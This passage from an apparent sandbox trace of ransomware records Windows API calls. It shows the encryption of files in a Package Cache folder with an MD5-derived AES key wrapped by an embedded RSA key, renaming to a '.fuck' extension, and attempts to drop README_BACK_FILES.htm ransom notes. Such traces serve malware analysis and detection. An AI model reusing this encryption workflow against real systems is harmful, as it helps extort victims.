dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28f1ec0) returned 1 [0240.977] CryptImportPublicKeyInfo (in: hCryptProv=0x28f1ec0, dwCertEncodingType=0x1, pInfo=0x2906d48*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2906d78*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2906d80*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x28e73b8) returned 1 [0240.977] CryptEncrypt (in: hKey=0x28e73b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0240.977] CryptEncrypt (in: hKey=0x28e73b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f1fd0*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x28f1fd0*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0240.977] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f1fd0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0240.977] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0240.977] CryptEncrypt (in: hKey=0x28e7238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0240.977] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0240.977] CloseHandle (hObject=0xffffffff) returned 1 [0240.978] CloseHandle (hObject=0xffffffff) returned 1 [0240.978] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.gsg" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm"), bFailIfExists=0) returned 0 [0240.978] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm", dwFileAttributes=0x0) returned 0 [0240.978] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.gsg" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.gsg")) returned 0 [0240.979] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.fuck" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.fuck")) returned 0 [0240.979] CryptDestroyHash (hHash=0x28e8578) returned 1 [0240.979] CryptDestroyKey (hKey=0x28e7238) returned 1 [0240.979] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0240.979] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.980] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0240.980] FindClose (in: hFindFile=0x28e84f8 | out: hFindFile=0x28e84f8) returned 1 [0240.980] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\readme_back_files.htm")) returned 0xffffffff [0240.980] AreFileApisANSI () returned 1 [0240.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x27e22a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 95 [0240.980] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.980] GetLastError () returned 0x5 [0240.980] GetLastError () returned 0x5 [0240.981] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0240.981] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28e84f8 [0240.981] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.981] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.981] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28e8578 [0240.981] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.981] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.981] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x28e8638 [0240.981] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.981] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.982] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0240.982] GetLastError () returned 0x5 [0240.982] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab")) returned 0x20 [0240.982] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab", dwFileAttributes=0x80) returned 0 [0240.982] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.983] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab.gsg" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.983] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab.gsg", dwFileAttributes=0x2) returned 0 [0240.984] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28f20e0) returned 1 [0240.986] CryptCreateHash (in: hProv=0x28f20e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0240.986] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0240.986] CryptHashData (hHash=0x28e7238, pbData=0x2ec6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.986] CryptDeriveKey (in: hProv=0x28f20e0, Algid=0x6610, hBaseData=0x28e7238, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28e7738) returned 1 [0240.986] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----d", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.986] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0240.986] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28f2168) returned 1 [0240.987] CryptImportPublicKeyInfo (in: hCryptProv=0x28f2168, dwCertEncodingType=0x1, pInfo=0x2907498*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29074c8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29074d0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28e7778) returned 1 [0240.987] CryptEncrypt (in: hKey=0x28e7778, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0240.987] CryptEncrypt (in: hKey=0x28e7778, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f2520*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28f2520*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0240.987] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f2520, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.987] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0240.987] CryptEncrypt (in: hKey=0x28e7738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0240.987] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.987] CloseHandle (hObject=0xffffffff) returned 1 [0240.987] CloseHandle (hObject=0xffffffff) returned 1 [0240.987] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab.gsg" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab"), bFailIfExists=0) returned 0 [0240.988] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab", dwFileAttributes=0x0) returned 0 [0240.988] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab.gsg" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab.gsg")) returned 0 [0240.989] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab.fuck" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab.fuck")) returned 0 [0240.989] CryptDestroyHash (hHash=0x28e7238) returned 1 [0240.989] CryptDestroyKey (hKey=0x28e7738) returned 1 [0240.989] CryptReleaseContext (hProv=0x28f20e0, dwFlags=0x0) returned 1 [0240.989] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.989] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0240.989] GetLastError () returned 0x5 [0240.989] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi")) returned 0x20 [0240.990] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi", dwFileAttributes=0x80) returned 0 [0240.990] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.991] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.gsg" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.991] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.gsg", dwFileAttributes=0x2) returned 0 [0240.992] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28f2630) returned 1 [0240.994] CryptCreateHash (in: hProv=0x28f2630, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0240.994] lstrlenA (lpString="qEREZXpzESADZCNMHncAEFNjzMlQm") returned 29 [0240.994] CryptHashData (hHash=0x28e76b8, pbData=0x2ec6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.994] CryptDeriveKey (in: hProv=0x28f2630, Algid=0x6610, hBaseData=0x28e76b8, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28e77b8) returned 1 [0240.994] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----d", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.994] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0240.995] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28f20e0) returned 1 [0240.995] CryptImportPublicKeyInfo (in: hCryptProv=0x28f20e0, dwCertEncodingType=0x1, pInfo=0x2907a48*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2907a78*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2907a80*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28e77f8) returned 1 [0240.995] CryptEncrypt (in: hKey=0x28e77f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0240.995] CryptEncrypt (in: hKey=0x28e77f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f2410*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28f2410*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0240.995] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f2410, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.995] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0240.995] CryptEncrypt (in: hKey=0x28e77b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0240.996] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.996] CloseHandle (hObject=0xffffffff) returned 1 [0240.996] CloseHandle (hObject=0xffffffff) returned 1 [0240.996] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.gsg" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), bFailIfExists=0) returned 0 [0240.996] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi", dwFileAttributes=0x0) returned 0 [0240.997] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.gsg" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.gsg")) returned 0 [0240.997] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), lpNewFileName="C:\\\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.fuck" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.fuck")) returned 0 [0240.997] CryptDestroyHash (hHash=0x28e76b8) returned 1 [0240.997] CryptDestroyKey (hKey=0x28e77b8) returned 1 [0240.998] CryptReleaseContext (hProv=0x28f2630, dwFlags=0x0) returned 1 [0240.998] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0240.998] FindClose (in: hFindFile=0x28e8638 | out: hFindFile=0x28e8638) returned 1 [0240.998] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\readme_back_files.htm")) returned 0xffffffff [0240.998] AreFileApisANSI () returned 1 [0240.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x291c9a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 139 [0240.998] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.999] GetLastError () returned 0x5 [0240.999] GetLastError () returned 0x5 [0240.999] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0240.999] FindClose (in: hFindFile=0x28e8578 | out: hFindFile=0x28e8578) returned 1 [0240.999] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\readme_back_files.htm")) returned 0xffffffff [0240.999] AreFileApisANSI () returned 1 [0240.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f6348, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 115 [0240.999] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0241.000] GetLastError () returned 0x5 [0241.000] GetLastError () returned 0x5 [0241.000] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0241.000] FindClose (in: hFindFile=0x28e84f8 | out: hFindFile=0x28e84f8) returned 1 [0241.000] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package 